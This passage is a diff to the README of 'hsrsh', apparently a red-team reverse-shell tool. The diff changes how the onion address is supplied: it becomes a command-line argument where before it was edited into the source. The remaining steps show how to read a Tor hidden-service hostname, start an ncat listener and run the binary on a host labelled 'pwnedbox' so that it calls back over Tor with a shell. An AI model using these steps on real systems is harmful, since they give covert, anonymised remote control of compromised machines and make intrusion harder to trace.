Red-infosec/hsrsh/README.md

   $ cat /var/lib/tor/hidden_service/hostname
   changeme.onion
   ```

-2. Edit ```src/main.rs``` and add your onion address to the ```ONION_LISTENER``` variable

-3. Start listener on the hidden service using ```ncat```.
+2. Start listener on the hidden service using ```ncat```.
 MAKE SURE TO ONLY ALLOW LOCALHOST CONNECTIONS

   ```
     user@localhost:~$ ncat --allow 127.0.0.1 -nvl 127.0.0.1 -p 1337
     Ncat: Listening on 0.0.0.0:1337
   ```

-4. Execute reverse shell binary, it will create a local tor instance and connect to your listener.
+3. Execute reverse shell binary, it will create a local tor instance and connect to your listener.
 This takes about 15 seconds.
     ```
     user@pwnedbox:~$ ./hsrsh
+    USAGE:
+    	./hsrsh changeme.onion:1337

+    user@pwnedbox:~$ ./hsrsh changeme.onion:1337
     ```

-5. If everything is setup properly your shell should connect after about 20 seconds or so assuming the tor and internet connection is stable.
+4. If everything is setup properly your shell should connect after about 20 seconds or so assuming the tor and internet connection is stable.

   ```
     user@localhost:~$ ncat --allow 127.0.0.1 -nvlp 1337